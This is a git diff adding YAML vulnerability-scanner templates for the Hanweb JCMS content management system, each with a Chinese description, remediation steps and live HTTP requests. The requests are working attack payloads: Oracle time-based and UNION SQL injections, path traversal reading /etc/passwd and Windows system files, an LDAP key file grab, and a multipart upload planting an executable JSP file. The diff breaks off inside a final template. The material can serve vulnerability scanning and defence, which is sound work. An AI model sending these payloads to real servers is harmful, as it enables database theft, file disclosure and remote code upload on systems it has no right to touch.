"a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Opr_Wap_Col_Jsp-SQLi.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Opr_Wap_Col_Jsp-SQLi.yaml" new file mode 100755 index 000000000..b90b3b328 --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Opr_Wap_Col_Jsp-SQLi.yaml" @@ -0,0 +1,34 @@ +id: JCMS-Opr_Wap_Col_Jsp-SQLi +info: + name: 大汉JCMS opr_wap_col.jsp 注入漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS opr_wap_col.jsp SQL注入漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==500 && duration>=4 + matchers-condition: and + path: + - '{{BaseURL}}/jcms/m_5_d/opr_wap_col.jsp?fn_billstatus=D&strid=1%29%20AND%209054%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28110%29%7C%7CCHR%2887%29%7C%7CCHR%2878%29%7C%7CCHR%2875%29%2C5%29%20AND%20%289211%3D9211' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Que_Dictionary_Jsp-SQLi.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Que_Dictionary_Jsp-SQLi.yaml" new file mode 100755 index 000000000..2b7c49527 --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Que_Dictionary_Jsp-SQLi.yaml" @@ -0,0 +1,36 @@ +id: JCMS-Que_Dictionary_Jsp-SQLi +info: + name: 大汉JCMS que_dictionary.jsp注入漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS que_dictionary.jsp SQL注入漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + dsl: + - status_code_1==200 && status_code_2==200 && contains(body_1,"tb_label_title_text") + && contains(body_2,"tb_label_title_text") + matchers-condition: and + path: + - '{{BaseURL}}/jcms/workflow/sys/que_dictionary.jsp?que_keywords1=-1%27%20OR%201%3D1%20AND%20%27a%27%3D%27a' + - '{{BaseURL}}/jcms/workflow/sys/que_dictionary.jsp?que_keywords1=-1%27%20OR%201%3D1%20AND%20%27a%27%3D%27b' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Que_Flow_Jsp-SQLi.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Que_Flow_Jsp-SQLi.yaml" new file mode 100755 index 000000000..b9e32e8bb --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Que_Flow_Jsp-SQLi.yaml" @@ -0,0 +1,44 @@ +id: JCMS-Que_Flow_Jsp-SQLi +info: + name: 大汉JCMS que_flow.jsp 注入漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS que_flow.jsp SQL注入漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - (duration_2 - duration_1) >= 5 + raw: + - | + GPOSTET /jcms/m_5_5/m_5_5_1/que_flow.jsp HTTP/1.1 + Host: {{Hostname}} + + que_classid=1 + - | + POST /jcms/m_5_5/m_5_5_1/que_flow.jsp HTTP/1.1 + Host: {{Hostname}} + + que_classid=1%27%20OR%206643%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2867%29%7C%7CCHR%28119%29%7C%7CCHR%2872%29%7C%7CCHR%28121%29%2C5%29%20AND%20%27MGfc%27%3D%27MGfc + req-condition: true diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Que_Model_JSP-Unauth.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Que_Model_JSP-Unauth.yaml" new file mode 100755 index 000000000..fe8eed836 --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Que_Model_JSP-Unauth.yaml" @@ -0,0 +1,28 @@ +id: JCMS-Que_Model_JSP-Unauth +info: + name: 大汉 JCMS que_model.jsp 越权访问 + author: + - l0ne1y + description: |- + 大汉JCMS que_model.jsp 越权访问漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在越权访问漏洞,攻击者可通过此漏洞获得系统信息。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"function doOptInterface") + matchers-condition: and + path: + - '{{BaseURL}}/jcms/workflow/design/que_model.jsp?userid=' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Que_Recemsg_Jsp-SQLi.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Que_Recemsg_Jsp-SQLi.yaml" new file mode 100755 index 000000000..2e0cf000a --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Que_Recemsg_Jsp-SQLi.yaml" @@ -0,0 +1,36 @@ +id: JCMS-Que_Recemsg_Jsp-SQLi +info: + name: 大汉JCMS que_recemsg.jsp 注入漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS que_recemsg.jsp SQL注入漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - (duration_2 - duration_1) >= 5 + path: + - '{{BaseURL}}/jcms/short_message/que_recemsg.jsp?que_keywords=1&loginid=a' + - '{{BaseURL}}/jcms/short_message/que_recemsg.jsp?que_keywords=1&loginid=a%27%20AND%201111%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28111%29%7C%7CCHR%2885%29%7C%7CCHR%2899%29%7C%7CCHR%28109%29%2C5%29%20AND%20%27a%27%3D%27a' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Selectx_List_JSP-SQLi.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Selectx_List_JSP-SQLi.yaml" new file mode 100755 index 000000000..75dbf2e7d --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Selectx_List_JSP-SQLi.yaml" @@ -0,0 +1,34 @@ +id: JCMS-Selectx_List_JSP-SQLi +info: + name: 大汉 JCMS selectx_list.jsp 注入漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS selectx_list.jsp SQL注入漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"~~~") + matchers-condition: and + path: + - '{{BaseURL}}/jcms/workflow/objectbox/selectx_list.jsp?id=1%27%20union%20select%20NULL%2CCHR%28126%29%7C%7CCHR%28126%29%7C%7CCHR%28126%29%7C%7CNVL%28CAST%28USER%20AS%20VARCHAR%284000%29%29%2CCHR%2832%29%29%7C%7CCHR%28126%29%7C%7CCHR%28126%29%7C%7CCHR%28126%29%20from%20dual--%20-' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-lm_sys_opr_uploadimg_JSP-FileUpload.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-lm_sys_opr_uploadimg_JSP-FileUpload.yaml" new file mode 100755 index 000000000..49e47971d --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-lm_sys_opr_uploadimg_JSP-FileUpload.yaml" @@ -0,0 +1,56 @@ +id: JCMS-lm_sys_opr_uploadimg_JSP-FileUpload +info: + name: 大汉(hanweb)jcms /lm/sys/opr_uploadimg.jsp 文件上传漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS opr_uploadimg.jsp 任意文件上传漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在任意文件上传漏洞。远程攻击者可以利用该漏洞上传文件并执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、及时修复Web上传代码。 + 10、不能有本地文件包含漏洞。 +requests: +- raw: + - | + POST /lm/sys/opr_uploadimg.jsp?action=upload&img=testvul.jsp HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Content-Length: 376 + Content-Type: multipart/form-data; boundary=4e400c16cce04a9d803521e49ff67443 + Connection: Keep-Alive + Accept: */* + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36 + + --4e400c16cce04a9d803521e49ff67443 + Content-Disposition: form-data; name="NewFile"; filename="57h9.gif" + Content-Type: image/gif + + <% + out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("ZTE2NTQyMTExMGJhMDMwOTlhMWMwMzkzMzczYzViNDM="))); + new java.io.File(application.getRealPath(request.getServletPath())).delete(); + %> + --4e400c16cce04a9d803521e49ff67443-- +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"e165421110ba03099a1c0393373c5b43") + matchers-condition: and + path: + - '{{BaseURL}}/images/testvul.jsp' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-m_1_9_user_Down_Jsp-FileDownload.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-m_1_9_user_Down_Jsp-FileDownload.yaml" new file mode 100755 index 000000000..41ac0eb33 --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-m_1_9_user_Down_Jsp-FileDownload.yaml" @@ -0,0 +1,34 @@ +id: JCMS-m_1_9_user_Down_Jsp-FileDownload +info: + name: 大汉 JCMS /jcms/m_1_9/user/down.jsp 文件下载漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS down.jsp 任意文件下载漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在任意文件下载漏洞,攻击者可利用漏洞读取任意文件内容。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + condition: or + dsl: + - status_code_1==200 && contains(body_1,"bash") + - status_code_2==200 && contains(body_2,"16-bit") + matchers-condition: and + path: + - '{{BaseURL}}/jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd' + - '{{BaseURL}}/jcms/m_1_9/user/down.jsp?abspathfile=C:\Windows\system.ini' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-opr_classajax_SQLi.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-opr_classajax_SQLi.yaml" new file mode 100755 index 000000000..7160857ee --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-opr_classajax_SQLi.yaml" @@ -0,0 +1,34 @@ +id: JCMS-opr_classajax_SQLi +info: + name: 大汉JCMS系统SQL注入漏洞 版本:VJCMS2.6.3-ZZSZF[U11] + author: + - l0ne1y + description: |- + 大汉JCMS opr_classajax.jsp SQL注入漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"qzqjqNYcLuHdPHkqkjvq") + matchers-condition: and + path: + - '{{BaseURL}}/jcms/jcms_files/jcms1/web1/site/module/sitesearch/opr_classajax.jsp?classid=11%20UNION%20ALL%20SELECT%20NULL,CHR(113)||CHR(122)||CHR(113)||CHR(106)||CHR(113)||CHR(78)||CHR(89)||CHR(99)||CHR(76)||CHR(117)||CHR(72)||CHR(100)||CHR(80)||CHR(72)||CHR(107)||CHR(113)||CHR(107)||CHR(106)||CHR(118)||CHR(113)%20FROM%20DUAL--' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/Jcms-Ldap-SecretKeyLeak.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/Jcms-Ldap-SecretKeyLeak.yaml" new file mode 100755 index 000000000..9cf6d3fb4 --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/Jcms-Ldap-SecretKeyLeak.yaml" @@ -0,0 +1,31 @@ +id: Jcms-Ldap-SecretKeyLeak +info: + name: 大汉网络通杀ldap密钥泄漏 + author: + - l0ne1y + description: |- + 大汉JCMS ldap密钥泄露漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在ldap密钥泄露漏洞,攻击者可通过获取ldap密钥来与服务器通信,以此可进行修改管理员密码等操作。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、去除页面中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、前后端同时对用户输入信息进行校验,双重验证机制。 + 5、调用功能前验证用户是否有权限调用相关功能。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"") && contains(body,"") + matchers-condition: and + path: + - '{{BaseURL}}/jcms/interface/ldap/ldapconf.xml' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/Jcms-module_voting_down-FileDownload.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/Jcms-module_voting_down-FileDownload.yaml" new file mode 100755 index 000000000..6c947f11a --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/Jcms-module_voting_down-FileDownload.yaml" @@ -0,0 +1,34 @@ +id: Jcms-module_voting_down-FileDownload +info: + name: 大汉网络JCMS module/voting/down.jsp任意文件下载 + author: + - l0ne1y + description: |- + 大汉JCMS down.jsp 任意文件下载漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在任意文件下载漏洞,攻击者可利用漏洞读取任意文件内容。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + condition: or + dsl: + - status_code_1==200 && contains(body_1,"root") + - status_code_2==200 && contains(body_2,"boot loader") + matchers-condition: and + path: + - '{{BaseURL}}/jcms/m_5_e/module/voting/down.jsp?filename=download.txt&pathfile=/etc/passwd' + - '{{BaseURL}}/jcms/m_5_e/module/voting/down.jsp?filename=download.txt&pathfile=c:\boot.ini' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/Lm-FileRead.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/Lm-FileRead.yaml" new file mode 100755 index 000000000..aced131e2 --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/Lm-FileRead.yaml" @@ -0,0 +1,37 @@ +id: Lm-FileRead +info: + name: 大汉cms多处任意文件读取漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS多处任意文件读取漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在任意文件读取漏洞,攻击者可利用漏洞读取任意文件内容。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: word + condition: and + words: + - root + - bash + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl' + - '{{BaseURL}}/lm/front/reg_2.jsp?sysid=/../../../../../../../../../../../../../etc/passwd%00%23' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-Coltop_Interface_JSP-SQLi.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-Coltop_Interface_JSP-SQLi.yaml" new file mode 100755 index 000000000..6731be1ec --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/VC-Coltop_Interface_JSP-SQLi.yaml" @@ -0,0 +1,35 @@ +id: VC-Coltop_Interface_JSP-SQLi +info: + name: 大汉VC coltop_interface.jsp 注入漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS coltop_interface.jsp SQL注入漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 